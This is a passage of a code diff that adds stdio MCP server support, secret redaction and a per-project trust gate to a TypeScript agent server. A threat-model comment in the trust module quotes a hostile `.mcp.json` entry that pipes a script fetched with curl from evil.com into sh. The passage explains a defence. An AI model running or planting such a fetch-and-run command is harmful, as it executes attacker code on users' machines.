+  grantStdioMcpTrust: (projectId: string) =>
+    request(
+      `/api/v1/mcp/trust/${encodeURIComponent(projectId)}`,
+      (v, s) => {
+        if (!isObject(v) || typeof v.trusted !== "boolean" || !Array.isArray(v.status)) {
+          fail(s, "expected { trusted, status }");
+        }
+        return { trusted: v.trusted, status: v.status as McpServerStatus[] };
+      },
+      { method: "POST", body: {} },
+    ),
+  /** Revoke stdio trust + disconnect every project-scope MCP entry. */
+  revokeStdioMcpTrust: (projectId: string) =>
+    request(
+      `/api/v1/mcp/trust/${encodeURIComponent(projectId)}`,
+      (v, s) => {
+        if (!isObject(v) || typeof v.trusted !== "boolean") {
+          fail(s, "expected { trusted }");
+        }
+        return { trusted: v.trusted };
+      },
+      { method: "DELETE" },
+    ),
   listSkills: (projectId: string) =>
     request(
       `/api/v1/config/skills?projectId=${encodeURIComponent(projectId)}`,

--- a/packages/client/src/lib/api-client/types.ts
+++ b/packages/client/src/lib/api-client/types.ts
@@ -42,24 +42,46 @@ export interface ChangePasswordResponse {
 // ---------------- MCP ----------------
 
 export type McpTransport = "auto" | "streamable-http" | "sse";
-export type McpConnectionState = "idle" | "connecting" | "connected" | "error" | "disabled";
+export type McpConnectionState =
+  | "idle"
+  | "connecting"
+  | "connected"
+  | "error"
+  | "disabled"
+  | "trust_required";
 
 export interface McpServerConfig {
-  url: string;
-  transport?: McpTransport;
   enabled?: boolean;
+  // remote-only (mutually exclusive with `command`)
+  url?: string;
+  transport?: McpTransport;
   headers?: Record<string, string>;
+  // stdio-only (mutually exclusive with `url`)
+  command?: string;
+  args?: string[];
+  env?: Record<string, string>;
+  cwd?: string;
 }
 
 export interface McpServerStatus {
   scope: "global" | "project";
   projectId?: string;
   name: string;
-  url: string;
+  /** Discriminator — `remote` ↦ render `url`/`transport`; `stdio` ↦
+   *  render `command`/`args`. */
+  kind: "remote" | "stdio";
+  /** Remote-only. Present when `kind === "remote"`. */
+  url?: string;
+  /** Stdio-only. */
+  command?: string;
+  /** Stdio-only. */
+  args?: string[];
   enabled: boolean;
   state: McpConnectionState;
   toolCount: number;
   lastError?: string;
+  /** Resolved remote transport — only meaningful when
+   *  `kind === "remote"`. */
   transport?: McpTransport;
 }
 
@@ -68,6 +90,9 @@ export interface McpServersResponse {
   servers: Record<string, McpServerConfig>;
   /** Status across global + (optionally) the queried project's scope. */
   status: McpServerStatus[];
+  /** Present only when `?projectId=<id>` was passed. Reports
+   *  whether this project has been granted stdio-MCP trust. */
+  stdioTrust?: { trusted: boolean };
 }
 
 export interface McpSettingsResponse {

--- a/packages/client/src/store/mcp-store.ts
+++ b/packages/client/src/store/mcp-store.ts
@@ -56,6 +56,9 @@ interface ProjectScopeData {
   /** Combined GLOBAL config + project status entries from the
    *  /mcp/servers?projectId= response. */
   status: McpServerStatus[];
+  /** Has the operator granted this project stdio-MCP trust?
+   *  `undefined` ↦ not yet loaded for this project. */
+  stdioTrust?: { trusted: boolean };
   loadedAt: number;
 }
 
@@ -76,6 +79,11 @@ interface McpState {
   upsertServer: (name: string, body: McpServerConfig) => Promise<void>;
   deleteServer: (name: string) => Promise<void>;
   probeServer: (name: string, projectId: string | undefined) => Promise<void>;
+  /** Grant / revoke per-project stdio MCP trust. Refreshes the
+   *  project after so the status entries flip from trust_required
+   *  to connected (or back). */
+  grantStdioTrust: (projectId: string) => Promise<void>;
+  revokeStdioTrust: (projectId: string) => Promise<void>;
 }
 
 function describeError(err: unknown): string {
@@ -144,15 +152,19 @@ export const useMcpStore = create<McpState>((set, get) => ({
     set({ loading: true });
     try {
       const list = await api.listMcpServers(projectId);
-      set((state) => ({
-        loading: false,
-        error: undefined,
-        globalServers: list.servers,
-        byProject: {
-          ...state.byProject,
-          [projectId]: { status: list.status, loadedAt: Date.now() },
-        },
-      }));
+      set((state) => {
+        const entry: ProjectScopeData = {
+          status: list.status,
+          loadedAt: Date.now(),
+        };
+        if (list.stdioTrust !== undefined) entry.stdioTrust = list.stdioTrust;
+        return {
+          loading: false,
+          error: undefined,
+          globalServers: list.servers,
+          byProject: { ...state.byProject, [projectId]: entry },
+        };
+      });
     } catch (err) {
       set({ loading: false, error: describeError(err) });
     }
@@ -210,6 +222,31 @@ export const useMcpStore = create<McpState>((set, get) => ({
     try {
       await api.probeMcpServer(name, projectId);
       await Promise.all([get().refreshSettings(), get().refreshProject(projectId)]);
+    } catch (err) {
+      set({ error: describeError(err) });
+      throw err;
+    }
+  },
+
+  grantStdioTrust: async (projectId) => {
+    try {
+      await api.grantStdioMcpTrust(projectId);
+      // Re-pull so status flips trust_required → connected for the
+      // gated entries the route just retried.
+      await get().refreshProject(projectId);
+    } catch (err) {
+      set({ error: describeError(err) });
+      throw err;
+    }
+  },
+
+  revokeStdioTrust: async (projectId) => {
+    try {
+      await api.revokeStdioMcpTrust(projectId);
+      // Server unloads the entire project pool on revoke; refresh
+      // pulls the post-revoke state (status: trust_required for
+      // stdio entries; remote entries re-connecting).
+      await get().refreshProject(projectId);
     } catch (err) {
       set({ error: describeError(err) });
       throw err;

--- a/packages/server/src/config.ts
+++ b/packages/server/src/config.ts
@@ -193,6 +193,17 @@ export const config = Object.freeze({
    */
   mcpConfigFile: join(FORGE_DATA_DIR, "mcp.json"),
   /**
+   * Path to the forge-private per-project stdio-MCP trust list. Each
+   * entry records that the operator has granted the named project
+   * permission to declare stdio (subprocess-spawning) MCP servers in
+   * its `.mcp.json`. Project-scoped stdio entries are gated by this
+   * file — first time we see them in an untrusted project, we refuse
+   * to spawn and the UI prompts. Global servers and remote
+   * (URL-based) project servers are never gated. See
+   * `mcp/stdio-trust.ts` for the threat-model framing.
+   */
+  mcpStdioTrustFile: join(FORGE_DATA_DIR, "mcp-stdio-trust.json"),
+  /**
    * Path to the forge-private per-project skill overrides file.
    * Lives in the data dir (NOT in PI_CONFIG_DIR — pi's settings.skills
    * is global, and not in `<project>/.pi/` — the user picked

--- a/packages/server/src/mcp/config.ts
+++ b/packages/server/src/mcp/config.ts
@@ -12,32 +12,79 @@ import { config } from "../config.js";
  * and the resulting tools are passed into every `createAgentSession`
  * call as `customTools`.
  *
- * v1 supports remote servers only (no stdio subprocesses). Auth is
- * static headers — set `Authorization: Bearer <token>` (or any other
- * header your server expects) and they're forwarded on every request.
- * OAuth and stdio are deferred.
+ * Two server kinds, discriminated by which fields are present (not
+ * by an explicit `kind` discriminator). Presence-based matching is
+ * deliberate — it matches the Claude Desktop / pi-mcp-adapter
+ * convention so a user's existing `.mcp.json` works without
+ * rewriting:
+ *
+ *   - **Remote** servers: have `url`. Spoken via StreamableHTTP /
+ *     SSE. Auth via static headers.
+ *   - **Stdio** servers: have `command`. The pi-forge spawns the
+ *     subprocess and speaks MCP over its stdin/stdout.
+ *
+ * Exactly one of `url` / `command` must be set per server; the route
+ * layer enforces this and rejects ambiguous configs with 400.
+ *
+ * **Secret hygiene.** `headers` values (remote) and `env` values
+ * (stdio) are treated as secret on the read path —
+ * `readMcpJsonRedacted` replaces every value with the sentinel so
+ * the browser never sees the raw token. On write, a sentinel value
+ * round-trips to the prior on-disk value so an "edit and save"
+ * doesn't lock the user out (same pattern as `models.json#apiKey`).
  */
 
 export type McpTransport = "auto" | "streamable-http" | "sse";
 
 export interface McpServerConfig {
-  /** Required. The MCP endpoint URL. */
-  url: string;
+  /** Default true. Disabled servers don't connect or contribute tools. */
+  enabled?: boolean;
+
+  /* --------- remote-only (mutually exclusive with `command`) --------- */
+  /** The MCP endpoint URL. Required for remote servers. */
+  url?: string;
   /**
-   * Transport hint. `auto` (default) tries StreamableHTTP first and
-   * falls back to SSE — covers fastmcp servers regardless of which
-   * transport they expose. Pin to `streamable-http` or `sse`
-   * explicitly to skip the fallback round-trip.
+   * Transport hint for remote servers. `auto` (default) tries
+   * StreamableHTTP first and falls back to SSE — covers fastmcp
+   * servers regardless of which transport they expose. Pin to
+   * `streamable-http` or `sse` explicitly to skip the fallback
+   * round-trip. Ignored for stdio servers.
    */
   transport?: McpTransport;
   /**
    * Per-request headers (e.g. `{ "Authorization": "Bearer ..." }`).
    * Forwarded on every MCP RPC. Treated as secret on the read path —
    * `readMcpJsonRedacted` replaces every value with the sentinel.
+   * Ignored for stdio servers.
    */
   headers?: Record<string, string>;
-  /** Default true. Disabled servers don't connect or contribute tools. */
-  enabled?: boolean;
+
+  /* --------- stdio-only (mutually exclusive with `url`) --------- */
+  /**
+   * Executable to spawn (passed to `child_process.spawn` via the MCP
+   * SDK's StdioClientTransport). Required for stdio servers. Resolved
+   * via the process PATH if not absolute. Common values: `npx`, `uvx`,
+   * `python`, a path to a local binary.
+   */
+  command?: string;
+  /** CLI args appended to `command`. Defaults to `[]`. */
+  args?: string[];
+  /**
+   * Explicit environment for the subprocess. The MCP SDK's
+   * `StdioClientTransport` does NOT inherit the pi-forge process
+   * env by default — it uses `getDefaultEnvironment()` which only
+   * exposes a small allowlist (PATH, HOME, locale vars, etc.). Set
+   * this to pass through provider keys / config the MCP server
+   * needs (e.g. `GITHUB_TOKEN`, `OPENAI_API_KEY`). Treated as secret
+   * on the read path (env values commonly contain credentials).
+   */
+  env?: Record<string, string>;
+  /**
+   * Working directory for the subprocess. Defaults to the project
+   * path for project-scoped servers, and the pi-forge process cwd
+   * for global servers.
+   */
+  cwd?: string;
 }
 
 export interface McpJson {
@@ -50,6 +97,17 @@ export interface McpJson {
    */
   disabled?: boolean;
   servers: Record<string, McpServerConfig>;
+}
+
+/**
+ * True when this entry should be opened as a stdio (subprocess)
+ * server, false when remote (URL). Single source of truth for the
+ * discriminator — callers don't have to re-derive
+ * `cfg.command !== undefined` everywhere, and a future migration to
+ * an explicit `kind` field has one place to change.
+ */
+export function isStdioConfig(cfg: McpServerConfig): boolean {
+  return typeof cfg.command === "string" && cfg.command.length > 0;
 }
 
 const SECRET_PLACEHOLDER = "***REDACTED***";
@@ -101,21 +159,41 @@ export async function readMcpJson(): Promise<McpJson> {
 }
 
 /**
- * Same as readMcpJson but with every header VALUE replaced with the
- * redaction sentinel. Used by the read-path API route so an inline
- * bearer token is never echoed back to the browser.
+ * Copy `src` to a fresh `McpServerConfig` keeping only fields that
+ * are not `undefined`. Centralizes the field list so the redact /
+ * write paths can't drift from each other when we add a field.
+ */
+function copyServerCleaned(src: McpServerConfig): McpServerConfig {
+  const out: McpServerConfig = {};
+  if (src.enabled !== undefined) out.enabled = src.enabled;
+  if (src.url !== undefined) out.url = src.url;
+  if (src.transport !== undefined) out.transport = src.transport;
+  if (src.command !== undefined) out.command = src.command;
+  if (src.args !== undefined) out.args = [...src.args];
+  if (src.cwd !== undefined) out.cwd = src.cwd;
+  return out;
+}
+
+/**
+ * Same as readMcpJson but with every secret VALUE replaced with the
+ * redaction sentinel. Covers both `headers` (remote) and `env`
+ * (stdio) — both fields commonly carry credentials.
  */
 export async function readMcpJsonRedacted(): Promise<McpJson> {
   const raw = await readMcpJson();
   const out: Record<string, McpServerConfig> = {};
   for (const [name, server] of Object.entries(raw.servers)) {
-    const cleaned: McpServerConfig = { url: server.url };
-    if (server.transport !== undefined) cleaned.transport = server.transport;
-    if (server.enabled !== undefined) cleaned.enabled = server.enabled;
+    const cleaned = copyServerCleaned(server);
     if (server.headers !== undefined) {
       cleaned.headers = {};
       for (const k of Object.keys(server.headers)) {
         cleaned.headers[k] = SECRET_PLACEHOLDER;
+      }
+    }
+    if (server.env !== undefined) {
+      cleaned.env = {};
+      for (const k of Object.keys(server.env)) {
+        cleaned.env[k] = SECRET_PLACEHOLDER;
       }
     }
     out[name] = cleaned;
@@ -124,31 +202,45 @@ export async function readMcpJsonRedacted(): Promise<McpJson> {
 }
 
 /**
- * Write `mcp.json`, merging the secret-placeholder for header values
- * back to the prior persisted value. Mirrors the round-trip safety
- * config-manager.writeModelsJson uses for `apiKey` — without this, an
- * "edit and save" round-trip from the UI would write the literal
- * sentinel back to disk and lock the user out of their MCP server.
+ * Merge a sentinel-bearing key/value map with the prior persisted
+ * one. Used for both `headers` and `env` — same shape, same logic,
+ * single helper. Sentinel ↦ prior value (or drop the key if no
+ * prior); real value ↦ overwrite.
+ */
+function mergeSecretMap(
+  next: Record<string, string>,
+  prior: Record<string, string> | undefined,
+): Record<string, string> {
+  const out: Record<string, string> = {};
+  for (const [k, v] of Object.entries(next)) {
+    if (v === SECRET_PLACEHOLDER) {
+      if (prior?.[k] !== undefined) out[k] = prior[k];
+    } else {
+      out[k] = v;
+    }
+  }
+  return out;
+}
+
+/**
+ * Write `mcp.json`, merging the secret-placeholder for `headers`
+ * AND `env` values back to the prior persisted value. Without this,
+ * an "edit and save" round-trip from the UI (which sees the
+ * sentinel) would write the literal sentinel back to disk and lock
+ * the user out of their MCP server. Same pattern as
+ * config-manager.writeModelsJson for `apiKey`.
  */
 export async function writeMcpJson(next: McpJson): Promise<void> {
   const existing: McpJson = await readMcpJson().catch(() => ({ servers: {} }));
   const safe: McpJson = { servers: {} };
   if (next.disabled === true) safe.disabled = true;
   for (const [name, server] of Object.entries(next.servers ?? {})) {
-    const merged: McpServerConfig = { url: server.url };
-    if (server.transport !== undefined) merged.transport = server.transport;
-    if (server.enabled !== undefined) merged.enabled = server.enabled;
+    const merged = copyServerCleaned(server);
     if (server.headers !== undefined) {
-      merged.headers = {};
-      const prior = existing.servers[name]?.headers ?? {};
-      for (const [hk, hv] of Object.entries(server.headers)) {
-        // Sentinel ↦ keep prior value (or drop the key if no prior).
-        if (hv === SECRET_PLACEHOLDER) {
-          if (prior[hk] !== undefined) merged.headers[hk] = prior[hk];
-        } else {
-          merged.headers[hk] = hv;
-        }
-      }
+      merged.headers = mergeSecretMap(server.headers, existing.servers[name]?.headers);
+    }
+    if (server.env !== undefined) {
+      merged.env = mergeSecretMap(server.env, existing.servers[name]?.env);
     }
     safe.servers[name] = merged;
   }

--- a/packages/server/src/mcp/manager.ts
+++ b/packages/server/src/mcp/manager.ts
@@ -3,8 +3,13 @@ import { join } from "node:path";
 import { Client } from "@modelcontextprotocol/sdk/client/index.js";
 import { StreamableHTTPClientTransport } from "@modelcontextprotocol/sdk/client/streamableHttp.js";
 import { SSEClientTransport } from "@modelcontextprotocol/sdk/client/sse.js";
+import {
+  getDefaultEnvironment,
+  StdioClientTransport,
+} from "@modelcontextprotocol/sdk/client/stdio.js";
 import type { ToolDefinition } from "@earendil-works/pi-coding-agent";
-import { readMcpJson, type McpServerConfig, type McpTransport } from "./config.js";
+import { isStdioConfig, readMcpJson, type McpServerConfig, type McpTransport } from "./config.js";
+import { isStdioTrustedForProject } from "./stdio-trust.js";
 import { bridgeMcpTool } from "./tool-bridge.js";
 
 /** Looser-than-the-SDK transport handle — we only need close().
@@ -34,12 +39,29 @@ interface ClosableTransport {
  * Connections are eager: we attempt to connect on `loadGlobal()` /
  * `loadProject()` so the status badge has something honest to show.
  *
- * v1 supports remote transports only (StreamableHTTP + SSE). stdio
- * deferred — the pi-forge is container-native and arbitrary
- * subprocess spawning has different security trade-offs.
+ * Supports three transports: StreamableHTTP and SSE (both remote
+ * URL-based) plus stdio (the manager spawns the configured
+ * subprocess and speaks MCP over its stdin/stdout). The transport
+ * for a given entry is selected by which fields are populated —
+ * `url` ↦ remote, `command` ↦ stdio. See `mcp/config.ts` for the
+ * presence-based discriminator rationale.
+ *
+ * **Stdio trust gate.** Project-scoped stdio entries (declared in
+ * `<projectPath>/.mcp.json`) are GATED behind a per-project trust
+ * decision (see `stdio-trust.ts`). Until the operator grants trust
+ * via the UI, the entry sits in `trust_required` state and is
+ * neither spawned nor surfaces tools. Global stdio entries (in
+ * `${FORGE_DATA_DIR}/mcp.json`) and remote project entries are
+ * never gated — the operator wrote those config files themselves.
  */
 
-export type ConnectionState = "idle" | "connecting" | "connected" | "error" | "disabled";
+export type ConnectionState =
+  | "idle"
+  | "connecting"
+  | "connected"
+  | "error"
+  | "disabled"
+  | "trust_required";
 export type Scope = "global" | { project: string };
 
 const PROJECT_MCP_FILE = ".mcp.json";
@@ -89,6 +111,7 @@ export async function loadGlobal(): Promise<void> {
 }
 
 export async function loadProject(projectId: string, projectPath: string): Promise<void> {
+  cachedProjectPaths.set(projectId, projectPath);
   const cfg = await readProjectMcpJson(projectPath);
   await syncScope({ project: projectId }, cfg);
   loadedProjects.add(projectId);
@@ -163,7 +186,15 @@ export interface ServerStatus {
   scope: "global" | "project";
   projectId?: string;
   name: string;
-  url: string;
+  /** Discriminator for the UI — `"remote"` ↦ render `url` +
+   *  `transport`; `"stdio"` ↦ render `command` + `args`. */
+  kind: "remote" | "stdio";
+  /** Remote-only. Present when `kind === "remote"`. */
+  url?: string;
+  /** Stdio-only. Present when `kind === "stdio"`. */
+  command?: string;
+  /** Stdio-only. */
+  args?: string[];
   enabled: boolean;
   state: ConnectionState;
   toolCount: number;
@@ -177,8 +208,8 @@ export interface ServerStatus {
    */
   tools: { name: string; shortName: string; description: string }[];
   lastError?: string;
-  /** Resolved transport — populated once a connection succeeds.
-   *  Useful for UI display when the user picked `auto`. */
+  /** Resolved remote transport — populated once a connection
+   *  succeeds. Only meaningful when `kind === "remote"`. */
   transport?: McpTransport;
 }
 
@@ -200,18 +231,25 @@ export function getStatus(opts?: { projectId?: string }): ServerStatus[] {
       shortName: t.name,
       description: t.description,
     }));
+    const isStdio = isStdioConfig(e.config);
     const status: ServerStatus = {
       scope: e.scope === "global" ? "global" : "project",
       name: e.name,
-      url: e.config.url,
+      kind: isStdio ? "stdio" : "remote",
       enabled: e.config.enabled !== false,
       state: e.state,
       toolCount: e.tools.length,
       tools,
     };
+    if (isStdio) {
+      if (e.config.command !== undefined) status.command = e.config.command;
+      if (e.config.args !== undefined) status.args = [...e.config.args];
+    } else {
+      if (e.config.url !== undefined) status.url = e.config.url;
+      if (e.config.transport !== undefined) status.transport = e.config.transport;
+    }
     if (e.scope !== "global") status.projectId = e.scope.project;
     if (e.lastError !== undefined) status.lastError = e.lastError;
-    if (e.config.transport !== undefined) status.transport = e.config.transport;
     out.push(status);
   }
   return out;
@@ -233,10 +271,58 @@ export async function probe(scope: Scope, name: string): Promise<ServerStatus | 
   );
 }
 
+/**
+ * Re-attempt connection for every project-scoped stdio entry stuck
+ * in `trust_required`. Called from the `POST /mcp/trust/:projectId`
+ * route after the operator grants trust — the entries are already
+ * in the pool (they were created by `loadProject`), we just need to
+ * retry the connect now that the trust gate would pass.
+ *
+ * Remote entries and global entries are untouched; their connection
+ * state doesn't change with stdio trust.
+ */
+export async function reconnectGatedStdioForProject(projectId: string): Promise<void> {
+  const toConnect: PoolEntry[] = [];
+  for (const e of pool.values()) {
+    if (e.scope === "global") continue;
+    if (e.scope.project !== projectId) continue;
+    if (e.state !== "trust_required") continue;
+    toConnect.push(e);
+  }
+  // Sequentially-awaited so the connect attempts don't all spawn
+  // subprocesses at the same instant — if the operator just clicked
+  // trust on a project with five stdio entries, staggering keeps the
+  // pi-forge log readable and avoids a thundering-herd spawn.
+  for (const entry of toConnect) {
+    await connectEntry(entry);
+  }
+}
+
+/**
+ * Drop every cached entry for a project — pool entries, the
+ * loadedProjects marker, and the cwd hint. Called when the operator
+ * revokes stdio trust so the next session-create in this project
+ * re-reads `.mcp.json` and re-gates anything that needs gating.
+ * Disconnects any currently-running subprocesses too.
+ */
+export async function unloadProject(projectId: string): Promise<void> {
+  const toClose: PoolEntry[] = [];
+  for (const [key, entry] of Array.from(pool.entries())) {
+    if (entry.scope === "global") continue;
+    if (entry.scope.project !== projectId) continue;
+    toClose.push(entry);
+    pool.delete(key);
+  }
+  await Promise.allSettled(toClose.map((e) => disconnectEntry(e)));
+  loadedProjects.delete(projectId);
+  cachedProjectPaths.delete(projectId);
+}
+
 export async function disposeAll(): Promise<void> {
   await Promise.allSettled(Array.from(pool.values()).map((entry) => disconnectEntry(entry)));
   pool.clear();
   loadedProjects.clear();
+  cachedProjectPaths.clear();
 }
 
 /* ----------------------------- internals ----------------------------- */
@@ -257,13 +343,10 @@ async function syncScope(scope: Scope, configs: Record<string, McpServerConfig>)
     const key = entryKey(scope, name);
     const existing = pool.get(key);
     if (existing !== undefined) {
-      const sameUrl = existing.config.url === cfg.url;
-      const sameTransport = existing.config.transport === cfg.transport;
       const sameEnabled = (existing.config.enabled !== false) === (cfg.enabled !== false);
-      const sameHeaders =
-        JSON.stringify(existing.config.headers ?? {}) === JSON.stringify(cfg.headers ?? {});
+      const sameConnectionFields = sameConnectionConfig(existing.config, cfg);
       existing.config = cfg;
-      if (sameUrl && sameTransport && sameEnabled && sameHeaders) {
+      if (sameEnabled && sameConnectionFields) {
         // Nothing meaningful changed; skip the disconnect/reconnect dance.
         continue;
       }
@@ -290,6 +373,25 @@ async function syncScope(scope: Scope, configs: Record<string, McpServerConfig>)
   }
 }
 
+/**
+ * Equality across every field that affects the underlying connection
+ * (excluding `enabled`, which the caller compares separately because
+ * a false→true flip needs to drop into connect, not just reconnect).
+ * Covers both remote (`url`, `transport`, `headers`) and stdio
+ * (`command`, `args`, `env`, `cwd`) — comparing the irrelevant set
+ * for a given kind is harmless because both sides are `undefined`.
+ */
+function sameConnectionConfig(a: McpServerConfig, b: McpServerConfig): boolean {
+  if (a.url !== b.url) return false;
+  if (a.transport !== b.transport) return false;
+  if (a.command !== b.command) return false;
+  if (a.cwd !== b.cwd) return false;
+  if (JSON.stringify(a.args ?? []) !== JSON.stringify(b.args ?? [])) return false;
+  if (JSON.stringify(a.headers ?? {}) !== JSON.stringify(b.headers ?? {})) return false;
+  if (JSON.stringify(a.env ?? {}) !== JSON.stringify(b.env ?? {})) return false;
+  return true;
+}
+
 function entryScopeMatches(a: Scope, b: Scope): boolean {
   if (a === "global" && b === "global") return true;
   if (a !== "global" && b !== "global") return a.project === b.project;
@@ -297,13 +399,30 @@ function entryScopeMatches(a: Scope, b: Scope): boolean {
 }
 
 async function connectEntry(entry: PoolEntry): Promise<void> {
+  // Project-scope stdio entries are gated behind a per-project trust
+  // decision (see stdio-trust.ts). Refuse to spawn until the operator
+  // grants trust via the UI. Global stdio entries and remote entries
+  // bypass the gate entirely.
+  if (isStdioConfig(entry.config) && entry.scope !== "global") {
+    const trusted = await isStdioTrustedForProject(entry.scope.project).catch(() => false);
+    if (!trusted) {
+      entry.state = "trust_required";
+      entry.lastError = "stdio MCP servers from this project require trust";
+      entry.tools = [];
+      entry.bridged = [];
+      return;
+    }
+  }
   entry.state = "connecting";
   delete entry.lastError;
   try {
-    const { client, transport, resolvedTransport } = await openConnection(entry.config);
+    const { client, transport, resolvedTransport } = await openConnection(
+      entry.config,
+      entry.scope,
+    );
     entry.client = client;
     entry.transport = transport;
-    entry.config.transport = resolvedTransport;
+    if (resolvedTransport !== undefined) entry.config.transport = resolvedTransport;
     const list = await client.listTools();
     entry.tools = (list.tools ?? []).map((t) => ({
       name: t.name,
@@ -353,15 +472,33 @@ async function disconnectEntry(entry: PoolEntry): Promise<void> {
 interface OpenedConnection {
   client: Client;
   transport: ClosableTransport;
-  resolvedTransport: McpTransport;
+  /** For remote connections, the wire-resolved transport
+   *  (StreamableHTTP / SSE). Undefined for stdio. */
+  resolvedTransport: McpTransport | undefined;
 }
 
 /**
- * Open a connection using the requested transport. `auto` (default)
- * attempts StreamableHTTP first, then falls back to SSE on failure —
- * covers fastmcp servers regardless of which transport they expose.
+ * Open a connection. Branches on the config's discriminator:
+ *  - stdio (`command` set) ↦ spawn the subprocess via
+ *    StdioClientTransport (cwd defaults to the project path for
+ *    project-scoped servers).
+ *  - remote (`url` set) ↦ tries StreamableHTTP first when
+ *    `transport: "auto"` (the default), falls back to SSE — covers
+ *    fastmcp servers regardless of which transport they expose.
+ *
+ * The route layer rejects configs where neither (or both) is set, so
+ * we don't have to defend against ambiguous input here.
  */
-async function openConnection(cfg: McpServerConfig): Promise<OpenedConnection> {
+async function openConnection(cfg: McpServerConfig, scope: Scope): Promise<OpenedConnection> {
+  if (isStdioConfig(cfg)) {
+    return await openStdio(cfg, scope);
+  }
+  if (cfg.url === undefined) {
+    // Shouldn't happen — the route validator rejects "neither url
+    // nor command" with a 400 before reaching the manager. Be loud
+    // if it does so a future regression surfaces immediately.
+    throw new Error("mcp: server has neither url nor command");
+  }
   const url = new URL(cfg.url);
   const requested: McpTransport = cfg.transport ?? "auto";
   if (requested === "streamable-http") {
@@ -377,6 +514,75 @@ async function openConnection(cfg: McpServerConfig): Promise<OpenedConnection> {
     return await openSse(url, cfg.headers);
   }
 }
+
+/**
+ * Spawn the configured subprocess and speak MCP over its stdin /
+ * stdout via the SDK's StdioClientTransport.
+ *
+ * **Env handling.** The SDK passes ONLY `cfg.env` (when set) to the
+ * child; it does NOT inherit from the pi-forge process env. We
+ * intentionally preserve that behavior — the operator must
+ * explicitly pass through any credential / config the subprocess
+ * needs. To keep common-case shells / runtimes working though, we
+ * always merge in the SDK's `getDefaultEnvironment()` allowlist
+ * (PATH, HOME, locale vars, etc.), with operator-supplied entries
+ * winning on collision so an explicit `PATH` override still works.
+ *
+ * **cwd.** Project-scoped entries default to the project path (the
+ * user's repo root); global entries inherit the pi-forge process
+ * cwd. An explicit `cfg.cwd` always wins.
+ *
+ * **stderr.** Inherited so the operator can see startup failures /
+ * tracebacks in the pi-forge log without having to pipe-and-pump
+ * the child's stderr ourselves.
+ */
+async function openStdio(cfg: McpServerConfig, scope: Scope): Promise<OpenedConnection> {
+  if (cfg.command === undefined || cfg.command.length === 0) {
+    throw new Error("mcp: stdio server requires a command");
+  }
+  // Project-scope cwd default: spawn relative to the user's repo
+  // root so paths inside `args` resolve sanely. Global entries
+  // inherit pi-forge's cwd unless overridden.
+  const resolvedCwd = cfg.cwd ?? (scope === "global" ? undefined : projectCwdHint(scope.project));
+  const env: Record<string, string> = {
+    ...getDefaultEnvironment(),
+    ...(cfg.env ?? {}),
+  };
+  const transport = new StdioClientTransport({
+    command: cfg.command,
+    args: cfg.args ?? [],
+    env,
+    ...(resolvedCwd !== undefined ? { cwd: resolvedCwd } : {}),
+    stderr: "inherit",
+  });
+  const client = new Client({ name: "pi-forge", version: "1.0.0" }, { capabilities: {} });
+  await client.connect(transport);
+  return { client, transport, resolvedTransport: undefined };
+}
+
+/**
+ * Lookup the cached project cwd. Returns undefined when the project
+ * isn't in the pool yet (defensive — `loadProject` always populates
+ * the pool with entries before connect, so the project path is
+ * already on the entries themselves, but we read from the entry
+ * rather than the projects file to keep this hot path free of disk
+ * I/O).
+ */
+function projectCwdHint(projectId: string): string | undefined {
+  for (const e of pool.values()) {
+    if (e.scope !== "global" && e.scope.project === projectId) {
+      return e.config.cwd ?? cachedProjectPaths.get(projectId);
+    }
+  }
+  return cachedProjectPaths.get(projectId);
+}
+
+/**
+ * Project-id → on-disk path cache, populated by `loadProject` so
+ * `openStdio` can default `cwd` without a project-manager round
+ * trip. Cleared in lockstep with the pool on `disposeAll`.
+ */
+const cachedProjectPaths = new Map<string, string>();
 
 // The MCP SDK's Transport interface and its concrete classes disagree
 // about whether `sessionId` is optional. Cast the concrete instances at

--- a/packages/server/src/mcp/stdio-trust.ts
+++ b/packages/server/src/mcp/stdio-trust.ts
@@ -1,0 +1,122 @@
+import { chmodSync } from "node:fs";
+import { mkdir, readFile, rename, unlink, writeFile } from "node:fs/promises";
+import { dirname } from "node:path";
+import { randomUUID } from "node:crypto";
+import { config } from "../config.js";
+
+/**
+ * Per-project "trust this project's stdio MCP servers" decisions.
+ *
+ * **Why this exists.** Project-scoped MCP entries are read from
+ * `<projectPath>/.mcp.json`, which lives inside the user's repo. A
+ * hostile repo could ship an `.mcp.json` with a stdio entry like
+ * `{ "command": "curl", "args": ["evil.com/script.sh", "|", "sh"] }`
+ * — and just opening the project would silently spawn the
+ * subprocess on the next `createAgentSession`. Remote (URL) entries
+ * have a smaller blast radius because they need a network endpoint
+ * to do anything; stdio is a local subprocess with whatever env the
+ * operator passes through.
+ *
+ * **What we do.** The first time we see project-scoped stdio
+ * entries in a project the user has not yet trusted for stdio MCP,
+ * we refuse to spawn them and surface a status with
+ * `state: "trust_required"`. The UI shows a prompt; the user clicks
+ * "Trust this project" and we record the projectId in
+ * `${FORGE_DATA_DIR}/mcp-stdio-trust.json`. Future loads bypass
+ * the gate. Remote entries in the same `.mcp.json` are NOT gated —
+ * they connect immediately.
+ *
+ * **Trust persists per-project.** Adding NEW stdio entries to an
+ * already-trusted project does NOT re-prompt. The trust decision is
+ * scoped to "this project's `.mcp.json` is allowed to declare stdio
+ * servers"; once you've decided that, the file's contents are part
+ * of the codebase you already trust. If you want a per-entry
+ * confirmation, untrust the project from Settings → MCP first.
+ */
+
+interface TrustState {
+  /** Map of projectId → trust granted at (ISO 8601). The timestamp
+   *  isn't load-bearing today; it's stored so the Settings → MCP
+   *  cascade view can show "trusted on YYYY-MM-DD" if we ever want
+   *  to surface that. */
+  projects: Record<string, { trustedAt: string }>;
+}
+
+const EMPTY: TrustState = { projects: {} };
+
+async function ensureDir(): Promise<void> {
+  await mkdir(dirname(config.mcpStdioTrustFile), { recursive: true });
+}
+
+async function atomicWrite(data: TrustState): Promise<void> {
+  await ensureDir();
+  const path = config.mcpStdioTrustFile;
+  const tmp = `${path}.${randomUUID()}.tmp`;
+  await writeFile(tmp, JSON.stringify(data, null, 2), { mode: 0o600 });
+  try {
+    chmodSync(tmp, 0o600);
+  } catch {
+    // best-effort
+  }
+  try {
+    await rename(tmp, path);
+  } catch (err) {
+    await unlink(tmp).catch(() => undefined);
+    throw err;
+  }
+}
+
+async function readAll(): Promise<TrustState> {
+  try {
+    const raw = await readFile(config.mcpStdioTrustFile, "utf8");
+    if (raw.trim().length === 0) return { projects: {} };
+    const parsed = JSON.parse(raw) as unknown;
+    if (typeof parsed !== "object" || parsed === null || !("projects" in parsed)) {
+      return { projects: {} };
+    }
+    const projects = (parsed as { projects?: unknown }).projects;
